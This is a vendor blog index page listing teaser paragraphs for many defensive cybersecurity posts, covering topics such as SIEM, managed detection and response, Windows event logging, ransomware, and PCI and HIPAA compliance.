Is it possible to avoid security breaches? Judging from recent headlines, probably not. Victims range from startups like Kreditech, to major retailers like Target,to the US State Department and even the White House. Regardless of the security measures you have in place, it is prudent to assume you will suffer a breach at some point. Be sure to have a response plan in place — just in case.
MSSP Live 2022 Top MSP Cybersecurity Takeaway: Teamwork Makes the Dream Work

MSSP Live 2022 Top MSP Cybersecurity Takeaway: Teamwork Makes the Dream Work

A common dedication to providing excellent client services, a driving need to enhance cybersecurity capabilities and an outstanding cyber monetization opportunity generated tremendous energy and focus among attendees at the recently concluded first annual MSSP Live event.

Pay Attention to System Security Access Events; logon

Pay Attention to System Security Access Events

There are five different ways you can log on in Windows called “logon types.” The Windows Security Log lists the logon type in event ID 4624 whenever you log on.
Perfect protection is not practical

Perfect protection is not practical

With distressing regularity, new breaches continue to make headlines. The biggest companies, the largest institutions both private and government are affected. Every sector is in the news.
How to Detect Low Level Permission Changes in Active Directory

How to Detect Low Level Permission Changes in Active Directory

We hear a lot about tracking privileged access today because privileged users like Domain Admins can do a lot of damage. But more importantly, if their accounts are compromised the attacker gets full control of your environment. In line with this concern, many security standards and compliance documents recommend tracking changes to privileged groups like Administrators, Domain Admins and Enterprise Admins in Windows, and related groups and roles in other applications and platforms.
Vulnerability Management and Protection: Think Like a Hacker

Vulnerability Management and Protection: Think Like a Hacker

Today’s modern attack surface encompasses the network, cloud, endpoints, mobile devices, and applications and is constantly under attack from well-armed cyber criminals. Vulnerability management offers strategic insight into vulnerable applications and devices from the viewpoint of a cyber criminal, that you can plug before attackers can exploit. Vulnerability management is for service providers as well as their end-customers.
Top 5 SIEM complaints

Top 5 SIEM complaints

Here’s our list of the Top 5 SIEM complaints:1) We bought a security information and event management (SIEM) system, but it’s too complicated and time-consuming, so we’re:
The 5 stages of SIEM Implementation

The 5 stages of SIEM Implementation

Are you familiar with the Kübler-Ross 5 Stages of Grief model? SIEM implementation (and indeed most enterprise software installations) bear a striking resemblance.
Cybersecurity Cyber Crime in 2023: What MSPs Need to Know

Cybersecurity Cyber Crime in 2023: What MSPs Need to Know

Managed service providers face a double-edged sword in the world of cyber security and cybercrime. In May 2022, a joint cybersecurity advisory from the UK, Australia, Canada, New Zealand and the US warned that MSPs are increasingly being targeted by cyber criminals. And cyber attacks on MSP customers, small-and medium-sized businesses (SMBs), will also continue to rise. It’s shaping up to be another year of increasingly sophisticated cyber incidents.
Cybersecurity is an Investment, Not a Cost Center

Cybersecurity is an Investment, Not a Cost Center

The cybersecurity threat landscape is in constant motion – ever evolving. According to Kaspersky Labs, 323,000 new malware strains are discovered daily! Clearly, this rate of increased risk to a company’s assets and business continuity warrants a smart investment in cybersecurity.
RetailNOW Recap 2016: Security Top of Mind for Attendees

RetailNOW Recap 2016: Security Top of Mind for Attendees

The event, aimed at connecting the point-of-sale (POS) technology ecosystem, was extremely successful because it gave us the perfect platform to further connect with our existing partners—and to meet and interact with industry leaders.
How to Protect Your Network from Ransomware Tips from the FBI

How to Protect Your Network from Ransomware Tips from the FBI

The FBI estimates that more than 4,000 ransomware attacks have occurred daily since the beginning of 2016. That’s a 300% increase from the previous year. This is due in part to the thriving sector of “ransomware-as-a-service.”
Report All the Binary Code Executing on Your Network with Sysmon Event IDs

Report All the Binary Code Executing on Your Network with Sysmon Event IDs

Computers do what they are told, whether good or bad. One of the best ways to detect intrusions is to recognize when computers are following bad instructions – whether in binary form or in some higher level scripting language.
Logging for HIPAA Part 2; Secure auditing in Linux

Logging for HIPAA Part 2; Secure auditing in Linux

HIPAA Logging HOWTO, Part 2 The Health Insurance Portability and Accountability Act of 1996 (HIPAA) outlines relevant security and privacy standards for health information – both electronic and physical. The main mission of the law is “to improve portability and continuity of health insurance coverage in the group and individual markets, to combat waste, fraud, and abuse in health insurance and health care delivery” (HIPAA Act of 1996 http://www.hhs.gov/ocr/privacy/). A recent enhancement to HIPAA is called Health Information Technology for Economic and Clinical Health Act or HITECH Act.
Maximize your SIEM ROI

Maximize your SIEM ROI

Far too many SIEM implementations are considered to be catastrophes. Having implemented hundreds of such projects, here are the three parts of a SIEM implementation which if followed will in fact minimize the drama but maximize the ROI.
How the EventTracker/Netsurion merger will bring you more powerful cybersecurity solutions

How the EventTracker/Netsurion merger will bring you more powerful cybersecurity solutions

We are delighted that EventTracker is now part of the Netsurion family. On October 13, 2016 we announced our merger with managed security services Netsurion. As part of the agreement, Netsurion’s majority shareholder, Providence Strategic Growth, the equity affiliate of Providence Equity Partners, made an investment in EventTracker to accelerate growth for our combined company.
Sustainable vs. Situational Values

Sustainable vs. Situational Values

I am often asked that if Log Management is so important to the modern IT department, then how come more than 80% of the market that “should” have adopted it has not done so?

Mobile Tech in Healthcare Can Put Your Practice at Risk

Mobile Tech in Healthcare Can Put Your Practice at Risk

While you focus on providing the best health service for your patients, it is easy to under-estimate the risks that you may be putting your practice should you implement mobile technology without basic security measures.
Monitoring DNS Traffic for Security Threats

Monitoring DNS Traffic for Security Threats

Cyber criminals are constantly developing increasingly sophisticated and dangerous malware programs. Statistics for the first quarter of 2016 compared to 2015 shows that malware attacks have quadrupled.
IT Security: How Much Should You Spend?

IT Security: How Much Should You Spend?

Just how much should you be spending on IT Security? It’s a vexing question to answer for many reasons as each situation has their unique circumstances and factors. But here are some insights garnered over the last decade in cybersecurity.
Malware, Ransomware, and the Next Big Threat

Malware, Ransomware, and the Next Big Threat

Imagine the lost revenue for a major retailer if they needed to shut down all of their stores for a few days, or even a few hours, especially over the busy holiday season. The impact would be devastating.
Detecting Zeus, Logging for incident response, and more

Detecting Zeus, Logging for incident response, and more

Preparing the Infrastructure From all the uses for log data across the spectrum of security, compliance, and operations, using logs for incident response presents a truly universal scenario – you can be forced to use logs for incident response at any moment, whether you’re prepared or not.
Are You Listening to Your Endpoints?

Are You Listening to Your Endpoints?

There’s plenty of interest in all kinds of advanced security technologies like threat intelligence, strong/dynamic authentication, data loss prevention and information rights management. However, so many organizations still don’t know that the basic indicators of compromise on their network are new processes and modified executables.
Research points to SIEM-as-a-Service

Research points to SIEM-as-a-Service

SC Magazine released the results of a research survey focused on the rising acceptance of SIEM-as-a-Service for the small and medium sized enterprise. The survey found that SMEs and companies with $1 billion or more in revenue or 5,000-plus employees faced similar challenges.

Six Proactive Steps to Expand Attack Surface Coverage

Organizations use 40+ products and IT tools on average to manage networks, SaaS applications, and endpoints. This fragmented approach creates data siloes and blind spots that hamper detection and incident response. Attackers actively look for easy targets like misconfigured websites and unpatched applications to exploit. Service Providers can leverage their strong business relationships and trusted advisor roles to help businesses protect their expanding attack surface and be more proactive regarding malware and breaches.
Key Elements of MDR for Powerful and Practical Cybersecurity

Key Elements of MDR for Powerful and Practical Cybersecurity

The rise in ransomware attack volume and sophistication is a wake-up call for executives and IT departments alike. Traditional perimeter-focused defenses, such as firewalls, are no longer sufficient against stealthy and financially-motivated attackers.
Three Indicators of Attack

Three Indicators of Attack

For many years now, the security industry has become somewhat reliant on ‘indicators of compromise’ (IoC) to act as clues that an organization has been breached. Every year, companies invest heavily in digital forensic tools to identify the perpetrators and which parts of the network were compromised in the aftermath of an attack.

The Cost of False IT Security Alarms

The Cost of False IT Security Alarms

Think about the burglar alarm systems that are common in residential neighborhoods. In the eye of the passive observer, an alarm system makes a lot of sense. They watch your home while you’re asleep or away, and call the police or fire department if anything happens. So for a small monthly fee you feel secure. Unfortunately, there are a few things that the alarm companies don’t tell you.
The Assume Breach Paradigm

The Assume Breach Paradigm

Given today’s threat landscape, let’s acknowledge that a breach has either already occurred within our network or that it’s only a matter of time until it will. Security prevention strategies and technologies cannot guarantee safety from every attack. It is more likely that an organization has already been compromised, but just hasn’t discovered it yet. Operating with this assumption reshapes detection and response strategies in a way that pushes the limits of any organization’s infrastructure, people, processes and technologies.
Diagnosing Account Lockout in Active Directory

Diagnosing Account Lockout in Active Directory

Here we are going to look for Event ID 4740. This is the security event that is logged whenever an account gets locked. “User X” is getting locked out and Security Event ID 4740 are logged on respective servers with detailed information.
Do you know where your data is?

Do you know where your data is?

In this fifth article of the series, we continue to explore the basic ways businesses can keep their networks safer. These include tools you can implement on your own and understand why taking action is vital to the safety of your business.
Ransomware-as-a-Service is Skyrocketing

Ransomware-as-a-Service is Skyrocketing

No matter what business you are in, it’s likely you view ransomware as one of the top cyber threats today. Adversaries are adapting and morphing their harmful techniques to better evade detection and infect a wider set of targets. As a result, ransomware has skyrocketed in the past two years, according to Cofense.
Big Data or Smart Questions for Effective Threat Hunting

Big Data or Smart Questions for Effective Threat Hunting

Advances in data analytics and increased connectivity have merged to create a powerful platform for change. Today, people, objects, and connections are producing data at unprecedented rates.?According to DOMO, 90% of all data today was created in the last two years with a whopping 2.5 quintillion bytes of data being produced per day.

AI-powered Ransomware: AI is Now a Critical Piece of Today' Security Puzzle

As ransomware groups enhance their capabilities with generative AI and sophisticated automation, security leaders need to extend their detection and response capabilities more than ever. 
What Is Managed Detection Response (MDR)? A Comprehensive Guide

What Is Managed Detection Response (MDR)? A Comprehensive Guide

As the importance of protecting valuable data and systems increases, organizations are facing mounting challenges in defending against sophisticated cyber attacks. To address these threats head-on, businesses are increasingly adopting advanced security solutions such as Managed Detection Response (MDR). In this comprehensive guide, we will explore the key components of MDR, highlighting its core elements, […]
True Cost of Data Breaches

True Cost of Data Breaches

The Cisco Annual Cybersecurity Report provides insights based on threat intelligence gathered by Cisco's security experts, combined with input from nearly 3,000 Chief Security Officers (CSOs), and other security operations leaders from businesses in 13 countries.
Think Like a Hacker with MITRE ATT&CK

Think Like a Hacker with MITRE ATT&CK

The threat landscape continues to accelerate, with sophisticated attacks becoming more commonplace as ransomware-as-a-service accelerates and legacy security tools fail to keep up. Financially motivated cyber criminals are explicitly targeting small and medium-sized businesses to steal sensitive data.
Securing Zoom Conferencing to Protect Data

Securing Zoom Conferencing to Protect Data

Business uncertainty has led to widespread adoption of working from home. Since most meaningful tasks in any organization require teamwork, this remote work approach has naturally led to a dramatic rise in the use of collaboration tools such as Zoom Conferencing.
Hungry...Hungry...HIPAA

Hungry...Hungry...HIPAA

I have fond memories of playing a board game called Hungry Hungry Hippos in my younger days. Today’s medical practices mirror the chaos of the game. Each day seems more hectic than the previous...
The True Cost of Setting Up and Operating a 24x7 Security Operations Center (SOC)

The True Cost of Setting Up and Operating a 24x7 Security Operations Center (SOC)

Understanding the costs behind setting up and running a Security Operations Center is important to making informed decisions about how much protection you can afford and how you will go about acquiring it. The simple answer to the question “How much does a SOC cost?” is that it depends on many variables. In this article we will break down those variables and provide typical costs that you can use to inform your decision making about how to best protect your organization.
MDR Cybersecurity: Strengthening Defenses Against Modern Threats

MDR Cybersecurity: Strengthening Defenses Against Modern Threats

In our interconnected world, the specter of cyber attacks casts a formidable shadow. With each technological advancement, cybercriminals adapt their tactics and strategies, posing new challenges for organizations. To effectively counter these ever-evolving threats, robust cybersecurity measures are essential. Among these measures, Managed Detection and Response (MDR) has emerged as a pivotal component in fortifying […]
Three critical advantages of EventTracker Essentials

Three critical advantages of EventTracker Essentials

By now it’s accepted that SIEM is a foundational technology for both securing a network from threats as well as demonstrating regulatory compliance. However, SIEM is not fit-and-forget technology, nor is it technically simple to implement and operate.
The Ten Steps Post Data Breach

The Ten Steps Post Data Breach

Nearly 60% of businesses have experienced a breach in the last two years. Have you ever considered what would happen if your business was breached? Do you have a plan of action?
Why are Workstation Security Logs so Important?

Why are Workstation Security Logs so Important?

No one needs to be convinced that monitoring Domain Controller security logs is important; member servers are equally as important: most people understand that member servers are where “our data” is located.
Is a Business Really Protected or is it Home Alone: Prevent, Detect, and Respond for True Security

Is a Business Really Protected or is it Home Alone: Prevent, Detect, and Respond for True Security

Protecting a business’ IT infrastructure and data can be difficult with the abundance of threats out there, the array of new data privacy regulations, and many cybersecurity solutions to choose from. Even today, far too many businesses still claim protection with just anti-virus and firewall, when these measures aren’t enough to keep up with advanced threats.
Security shield glows blue, symbolizes safety and encryption ,Managed Detection Response

Managed Detection Response Solutions: Enhancing Cybersecurity Defense

Today’s rapidly evolving digital landscape, organizations face an ever-growing threat of cyber-attacks. The traditional reactive approach to cybersecurity is no longer sufficient to protect sensitive data and critical systems. Managed Detection Response (MDR) solutions have emerged as a proactive and effective approach to enhance cybersecurity defense. In this blog, we will explore the core components, […]
Cost-Effective Log Management: What Log Data Does Your SIEM Need?

Cost-Effective Log Management: What Log Data Does Your SIEM Need?

Optimize your SIEM implementation by avoiding redundant analysis and focusing on the highest-value log data first.  Deciding which logs to analyze is an important step in the process of SIEM implementation. Every organization must answer this question based on its own network infrastructure, security posture, and risk profile. 
Challenges with Threat Intelligence or why a Honeynet is a good idea

Challenges with Threat Intelligence or why a Honeynet is a good idea

Shared threat intelligence is an attractive concept. The good guys share experiences about what the bad guys are doing thereby blunting attacks. This includes public-private partnerships like InfraGard, a partnership between the FBI and the private sector dedicated to sharing information and intelligence to prevent hostile acts against the U.S.
SIEM: Security, Incident AND Event MANAGEMENT, not Monitoring!

SIEM: Security, Incident AND Event MANAGEMENT, not Monitoring!

Unfortunately, IT is not perfect; nothing in our world can be. Compounding the inevitable failures and weaknesses in any system designed by fallible beings, are those with malicious or larcenous intent that search for exploitable system weaknesses.
Lumifi Soc providing Managed Detection Service

The Evolution of Managed Detection Response: A Comprehensive History 

Introduction to Managed Detection Response (MDR):  Managed Detection Response (MDR) has emerged as a crucial component in the field of cybersecurity, providing organizations with enhanced threat detection and response capabilities. In this blog, we will delve into the history of MDR, exploring its origins, advancements, and its current role in the modern cybersecurity landscape.  Early […]
global-business-internet-network-connection--Compromised Credential

How to Detect and Mitigate Compromised Credential Attacks

Most security technologies are ineffective against unauthorized users with stolen credentials.  Cybersecurity vendors spend a great deal of time and money warning against technical exploits and ransomware attacks. These are undoubtedly serious threats, but they are not nearly as complex or dangerous as compromised credential attacks.  In fact, although ransomware dominates headlines in the cybersecurity […]
Secure, Usable, Cheap: Pick any two

Secure, Usable, Cheap: Pick any two

This fundamental tradeoff between security, usability, and cost is critical. Yes, it is possible to have both security and usability, but at a cost, in terms of money, time and personnel. While making something both cost efficient and usable, or even making something secure and cost-efficient may not be very hard, it is however  more difficult and time consuming to make something both secure and usable. This takes a lot of effort and thinking because security takes planning and resources.

Three Causes of Incident Response Failure

Three Causes of Incident Response Failure

Breaches continue to be reported at a dizzying pace. In 2018 alone, a diverse range of companies — including Best Buy, Delta, Orbitz, Panera, Saks Fifth Avenue, and Sears — have been victimized.?These are not small companies, nor did they have small IT budgets. So, what’s the problem?
Lumifi-Celebrating-15-years-of-MDR - Managed Detection Response

Managed Detection Response Celebration: Join Our Exciting Journey!

We're thrilled to announce our momentous milestone as we start our journey of 15 years in the managed detection response field. Reflecting on our achievements, we express our appreciation for our outstanding team and valued industry partners. To honor this occasion, we're introducing Lumifi Day, a special celebration dedicated to our team members. Lumifi Day […]
Security Subsistence SyndromeSecurity Subsistence Syndrome

Security Subsistence Syndrome

Security Subsistence Syndrome (SSS) is defined as a mindset in an organization that believes it has no security choices and is underfunded, so it minimally spends to meet perceived statutory and regulatory requirements.

Ten Work-from-Home Cybersecurity and Productivity Tips

Ten Work-from-Home Cybersecurity and Productivity Tips

More Work-from-Home (WFH) scenarios due to COVID-19 present challenges as employees move from a trusted and secured office network to home networks with a variety of technology and cybersecurity rigor. Here are some tips to stay safe as you and your employees work remote.
Michael-Malone-Lumifi- Managed Detection Response

An interview with Michael Malone: The evolution of MDR

Q. Can you share with us the journey of Datashield/Lumifi and how it has evolved in the field of Managed Detection and Response (MDR)? What were the key milestones and challenges along the way?  Datashield/Lumifi has come a long way in Managed Detection and Response (MDR). Our journey began as an investment by myself and […]
How to Protect Financial Data: 4 Cyber Risks MSPs Can't Ignore

How to Protect Financial Data: 4 Cyber Risks MSPs Can't Ignore

Banks have always been a prime target for cybercriminals. With enormous stores of cash and consumer data, and the massive threat of financial losses, regulatory consequences, and reputational damage, there’s really no choice for financial institutions but to innovate and accelerate their cybersecurity strategies.
Malicious Insiders in Healthcare: The Moment UEBA was Made For

Malicious Insiders in Healthcare: The Moment UEBA was Made For

With UEBA-powered platforms like Exabeam, you can catch threat actors who already work within your network.  External threats aren't the only kind of threat security leaders need to prepare for. Insider threats often pose an even greater risk. 
How to Leverage UEBA to Address Your Organization' Unique Risk Profile

How to Leverage UEBA to Address Your Organization' Unique Risk Profile

You can make UEBA technology work right out of the box – but custom configuration is needed to unlock its real value.   User Entity and Behavioral Analytics (UEBA) technology is a game-changing addition to any security tech stack. UEBA-enhanced insights allow security teams to detect sophisticated attacks that other technologies often miss.  Compromised credentials and […]
What You Should Know About PCI DSS 4

What You Should Know About 
PCI DSS 4

Discover PCI DSS v4.0, the latest global standard for securing payment card data. Released March 31, 2022, it enhances security against evolving threats.
Why Aren't Security Experts Talking About Public Administration?

Why Aren't Security Experts Talking About Public Administration?

Government agencies are quietly suffering a significant uptick in security incidents and data breaches – but the cybersecurity industry doesn't seem to have noticed yet.  One insight stands out among the many contained in Verizon' 2023 Data Breach Investigation Report.  
Verizon's 2023 Data Breach Report

Top 5 Takeaways from Verizon's 2023 Data Breach Report

Cybercriminals are adopting new, more sophisticated tactics. Security leaders can't depend on purely technical solutions that ignore the human element.  If there is one broad theme to Verizon's 2023 Data Breach Report, it's that the arms race between cybercriminals and cybersecurity professionals hinges on the human element more than ever. The report declares this clearly […]
PCI DSS 4 Requirements: What It Means for You

PCI DSS 4 Requirements: What It Means for You

Are you compliant with PCI DSS Version 4? Restaurants, retailers, hotels, doctors' and lawyers' offices, and many more, all need to watch for PCI DSS updates to remain compliant.
The Ultimate Playbook to Become an MSSP

The Ultimate Playbook to Become an MSSP

Now that advanced cybersecurity protections are a must-have in today’s landscape, organizations of all sizes are increasingly seeking out and leaning on a trusted security partner to manage their security services. A recent study released by Forrester revealed that 57 percent of companies are seeking outside help for IT systems monitoring and 45 percent are outsourcing threat detection and intelligence.

RSA Conference Key Takeaways for Cybersecurity Defenders

RSA Conference 2020 has come and gone. It still maintains its status as the largest security event in the world, although attendance dipped from last year due to virus jitters and travel restrictions. While the mood at RSA Conference (RSAC) overall was a bit more subdued than in the past, attendee engagement with the Netsurion team to discuss co-managed SIEM in the expo hall was at an all-time high.
Use Automation to Enhance the Value of Human Expertise in the SOC

Use Automation to Enhance the Value of Human Expertise in the SOC

Automation isn't always a replacement for human expertise. The two must work together to generate lasting security value.  Security Operations Centers have struggled with workforce shortages for years. Experts were already alarmed at the growing cybersecurity talent gap back in 2017.  
What you should know about programs, ports and services

What you should know about programs, ports and services

In this fourth article in the series, we continue to explore some of the basic ways that business of all sizes can keep their computer systems safer. We will discuss the topic of programs, ports and services.
Ransomware's Next Move

Ransomware's Next Move

While IT security teams identify, hunt, and remove specific variants of the ransomware, there may already be unknown mutated varieties lurking dormant and ready to execute.
How To Defend Against Threat Group Attacks

How To Defend Against Threat Group Attacks

It’s no secret that cybersecurity threats are rising for organizations of all sizes and industries.  U.S. cybersecurity authorities like the CISA, NSA, and the FBI are aware of recent reports of increased malicious cyber activity and expect this trend to continue. Organizations face security gaps and weaknesses from a patchwork of IT products and tools with little visibility and a false sense of security.
Compromised Credential Attacks Are Top Cause of Data Breaches

Compromised Credential Attacks Are Top Cause of Data Breaches

The use of stolen or compromised credentials remains the most common cause of a data breach. It was responsible for 19% of breaches studied by IBM in 2022. The reason? These attacks are relatively easy to plan and execute.
Protect Your Security Budget Against Economic Risks with MDR

Protect Your Security Budget Against Economic Risks with MDR

Security leaders are increasingly being asked to do more with less. In-house capabilities don't scale fast enough to keep up.  Business leaders are cutting costs across the board in preparation for a potential recession. Business units that were used to receiving ample funding are hitting limits to near-term growth. Organizations that used to fund ambitious […]
Uncover C&C traffic to nip malware

Uncover C&C traffic to nip malware

In a recent webinar, we demonstrated techniques by which EventTracker monitors DNS logs to uncover attempts by malware to communicate with Command and Control (C&C) servers. Modern malware uses DNS to resolve algorithm generated domain names to find and communicate with C&C servers.
Catch Malware Hiding in WMI with Sysmon

Catch Malware Hiding in WMI with Sysmon

Security is an ever-escalating arms race. The good guys have gotten better about monitoring the file system for artifacts of advanced threat actors.
The Perils of Using Remote Access Software

The Perils of Using Remote Access Software

While software that can be installed on your PC and used to remotely connect when you are away from your home office can be very handy, it also comes with risks that may not be apparent at first.
The Bite Behind the Bark: Enforcement Power of GDPR

The Bite Behind the Bark: Enforcement Power of GDPR

There’s an old saying: Their bark is worse than their bite. However, this is not the case with the penalties of non-compliance when it comes to the General Data Protection Regulation (GDPR). With the enforcement date of the GDPR having passed on May 25, 2018, any company not in compliance could be in for a very nasty shock.
Security Signals Everywhere: Finding the Real Crisis in a World of Noise

Security Signals Everywhere: Finding the Real Crisis in a World of Noise

Imagine dealing with a silent, but mentally grating barrage of security alerts every day. The security analyst’s dilemma?
Web Application

Renew Focus on Web Application Security

Today’s always-on digital businesses and service providers rely on web applications and APIs to fuel growth, run eCommerce sites and customer portals, and engage 24/7 with customers. Cyber criminals are also targeting these public-facing assets for monetary gain or to make a political statement. In fact, 43% of data breaches have been tied to web application vulnerabilities, highlighting the importance of understanding and protecting these business-critical assets. Managed Service Providers (MSPs) must also make protecting web applications a key priority.
SIEMpocalypse?

SIEMpocalypse?

Did you know that Microsoft is a security vendor? No, it’s true. For years, the company was hammered by negative public perception and the butt of jokes around the 2002 "trustworthy computing" memo. The company has steadily invested in developing a security mindset and the product results are now more visible to the public.
Looking back: Operation Buckshot Yankee & agent.btz

Looking back: Operation Buckshot Yankee & agent.btz

It was the fall of 2008. A variant of a three year old relatively benign worm began infecting U.S. military networks via thumb drives.
What is EDR and Why It is Critical to SMB Security?

What is EDR and Why It is Critical to SMB Security?

Over 7 billion global devices in an always on and continuously connected world create a soft target for today’s attacker. Whether working to monetize data or make a political statement, adversaries are well funded and staffed in the battle for endpoint access and control.
Tracking Physical Presence with the Windows Security Log

Tracking Physical Presence with the Windows Security Log

How do you figure out when someone was actually logged onto their PC? The data is there in the security log, but it’s so much harder than you’d think.
Universal Plug and Play - New Report on an Old Problem

Universal Plug and Play - New Report on an Old Problem

In the dark ages of personal computers (1980′s and 90′s), you either needed to be a computer geek or have access to one if you wanted any device to work with your computer. You had to go through a complicated driver installation process, and possibly replace system files. My how the world has changed.
The Impact Of A Data Breach

The Impact Of A Data Breach

What is the true cost of a data breach? A data breach affects your business, brand, and reputation. But it can be prevented.
Threat Hunting: Five Myths for MSPs to Overcome

Threat Hunting: Five Myths for MSPs to Overcome

Threat hunting is gaining traction as businesses look for more proactive methods to combat multi-stage ransomware attacks and devious “low and slow” hackers. Threat hunting complements threat detection and response to provide a more comprehensive and layered approach. Many managed service providers (MSPs) actively seek ways to become proactive and offer guided remediation that actively stops and blocks threats. The lack of staff and skills, along with unfamiliarity with threat hunting processes and techniques, can all inhibit adoption.
Six Simple Rules For Safe Credit Card Handling

Six Simple Rules For Safe Credit Card Handling

It is becoming more and more frequent to read about electronic data breaches in the news these days. Unfortunately, what is not touched on as frequently are the physical security issues present in restaurant and retail establishments.
PCI 3.0 Is Coming - Are You Ready?

PCI 3.0 Is Coming - Are You Ready?

Every 3 years the Payment Card Industry Data Security Standard (PCI) is updated to a new version. The time for the next release is right around the corner. Are you Ready?
Logs vs Bots and Malware Today

Logs vs Bots and Malware Today

Despite the fact that security industry has been fighting malicious software – viruses, worms, spyware, bots and other malware since the late 1980s, malware still represents one of the key threat factors for organizations today. While silly viruses of the 1990s and noisy worms (Blaster, Slammer, etc.) of the early 2000’s have been replaced by commercial bots and so-called “advanced persistent threats,” the malware fight rages on.
Idea to retire: Do more with less

Idea to retire: Do more with less

Ideas to Retire is a TechTank series of blog posts that identify outdated practices in public sector IT management and suggest new ideas for improved outcomes. Dr. John Leslie King is W.W. Bishop Professor in the School of Information at the University of Michigan.
User Location Affinity

User Location Affinity

It’s clear that we are now working under the assumption of a breach. The challenge is to find the attacker before they cause damage. Once attackers gain a beach head within the organization, they pivot to other systems. The Verizon DBIR  shows that compromised credentials make up a whopping 76% of all network incursions.
Threat Intelligence and The Pyramid of Pain

Threat Intelligence and The Pyramid of Pain

There is great interest among security technology and service providers about the intersection of global threat intelligence with local observations in the network. While there is certainly cause for excitement, it’s worth pausing to ask the question “Is Threat Intelligence being used effectively?”

Netsurion services and OpenSSL the Heartbleed issue

Netsurion services and OpenSSL the Heartbleed issue

Many of our customers and resellers have asked how Heartbleed affected Netsurion services. In a nutshell, the managed services that make up our product offerings were not directly affected by Heartbleed.
Key takeaways from the presidential debate on cybersecurity.

Key takeaways from the presidential debate on cybersecurity.

?The presidential debate, as entertaining as it was for many, was a great place to hear about the focus needed on cybersecurity issues in this country. Both candidates were asked the following question on the topic of cybersecurity in the U.S...
Can your Cybersecurity Posture be Called "Reactive Chaos"?

Can your Cybersecurity Posture be Called "Reactive Chaos"?

Does this sound familiar? You have no control of your environment and most of your efforts are diverted into understanding what happened, containing the damage, and remediating the issue.
Square Cash - A Money Transfer Game Changer?

Square Cash - A Money Transfer Game Changer?

Square strives to make financial transactions simple enough so that the average person on the street can participate. Before Square, a regular person without a bank supplied merchant account could not take credit cards. Today, Square allows everyone with a smart phone to accept credit cards, and now the company is focusing on another market – person to person cash payments.
How to Combat the Rising Costs of Cybersecurity Insurance

How to Combat the Rising Costs of Cybersecurity Insurance

Even though your business may have cybersecurity insurance, it doesn’t mean you can avoid the steps necessary to prevent bad things from happening. Similar to our own healthcare, it’s no secret that being diligent with preventative care and a consistent healthy lifestyle not only protects your health but also protects your pocketbook from more serious illness, no matter what kind of insurance you have. 
Backoff Is the New Standard by Which Other Malware Will Be Judged

Backoff Is the New Standard by Which Other Malware Will Be Judged

Every now and then hackers develop a piece of malware that is so insidious that it changes the landscape of computer security and acceptable practices. While there are many contenders for this dubious list, CodeRed, Zeus, and now Backoff are certainly worthy of inclusion.
Five Takeaways from the 2019 SIEM Study

Five Takeaways from the 2019 SIEM Study

We recently released the findings of the Security Information and Event Management (SIEM) study conducted by Cybersecurity Insights. The study surveyed over 345 IT and Security executives and practitioners, with 45% of them small and mid-sized firms with 999 or fewer employees and the balance comprised of enterprise organizations with 1,000 or more employees.
The Transition to EMV Isn't Over

The Transition to EMV Isn't Over

Merchants know by now that after October 1st the liability for card-present fraud will shift to whichever party is the least EMV-compliant in a fraudulent transaction. This means that merchants will be more accountable if EMV is not implemented.
Consolidation: The Cure for Cybersecurity Vendor Sprawl

Consolidation: The Cure for Cybersecurity Vendor Sprawl

There are three cybersecurity “givens” that small-to-medium-sized businesses (SMBs) often face. One is you are not too small to be targeted by cyber criminals. Even big ransomware gangs are refocusing their efforts on mid-sized victims to avoid scrutiny. A second is that your attack surface is expanding – particularly with the move to cloud, Software-as-a-Service (SaaS) adoption, and Work-From-Home (WFH) – while threat actors continue to evolve new, more sophisticated approaches.
Cybersecurity Trends and Predictions 2019

Cybersecurity Trends and Predictions 2019

The year 2018 saw ransomware families such as CryptoLocker and variants like Locky continue to plague organizations as cybersecurity adversaries morph their techniques to avoid detection. Several massive data breaches this year include Quora, Ticketmaster, and Facebook that exposed over 200 million records worldwide. As the year winds down, here’s what small and mid-sized organizations may experience in 2019 with an eye towards enhancing security.
Are honeypots illegal?

Are honeypots illegal?

In computer terminology, a honeypot is a computer system set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of IT systems. Generally, a honeypot appears to be part of a network, but is actually isolated and monitored, and which seems to contain information or a resource of value to attackers.
Is the ELK Stack a SIEM?

Is the ELK Stack a SIEM?

The ELK (Elasticsearch, Logstash, Kibana) stack is a popular open source log analysis and management platform. The collection, processing, normalization, enhancement, and storage of log data from various sources are grouped under the term “log management.”
Cybercrime Doesn't Take a Holiday

Cybercrime Doesn't Take a Holiday

The holidays are a busy time for most business owners as they ramp up to serve consumers excited to find holiday specials, or even as they prepare for time away from their businesses to spend time with friends and family. Hackers know that you are distracted from your core duties and normal routine and will look for vulnerabilities in your systems.
Top three reasons SIEM solutions fail

Top three reasons SIEM solutions fail

We have been implementing Security Information and Event Management (SIEM) solutions for more than 10 years. We serve hundreds of active SIEM users and implementations. We have had many awesome, celebratory, cork-popping successes. Unfortunately, we’ve also had our share of sad, tearful, profanity-filled failures.
Cloud and SaaS Security: Mind the Gap

Cloud and SaaS Security: Mind the Gap

Software-as-a-Service (SaaS) applications and infrastructure providers like Amazon Web Services (AWS) and Microsoft Azure have become the norm for organizations large and small. Enhancing cloud security maturity is even more critical given the proliferation of cloud workloads and a chronic shortage of cloud expertise.
Protecting Managed Service Providers from Cyber Attacks

Protecting Managed Service Providers from Cyber Attacks

As a Managed Service Provider (MSP) offering IT infrastructure and end-user systems, your clients rely on you with their valuable assets, sensitive data, and intellectual property. What security best practices can MSPs utilize to avoid becoming a headline?
Subtraction, Multiplication, Division and Task Unification through SIEM and Log Management

Subtraction, Multiplication, Division and Task Unification through SIEM and Log Management

When we originally conceived the idea of SIEM and log management solution for IT managers many years ago, it was because of the problems they faced dealing with high volumes of cryptic audit logs from multiple sources. Searching, categorizing/analyzing, performing forensics and remediation for system security and operational challenges evidenced in disparate audit logs were time consuming, tedious, inconsistent and unrewarding tasks.  We wanted to provide technology that would make problem detection, understanding and therefore remediation, faster and easier

The EPS Myth

The EPS Myth

Often when I engage with a prospect their first question is “How many events per second (EPS) can EventTracker handle?” People tend to confuse EPS with scalability so by simply giving back an enormous-enough number (usually larger than the previous vendor they spoke with) it convinces them your product is, indeed, scalable.
Master the Art of Selling Managed Security Services as an MSP

Master the Art of Selling Managed Security Services as an MSP

When it comes to selling security, one of the major challenges faced by managed services providers (MSPs) is changing the mind set of small- and medium-sized business (SMB) owners. With massive breaches hogging news headlines today, security is hard to ignore.
Five Myths About Ransomware

Five Myths About Ransomware

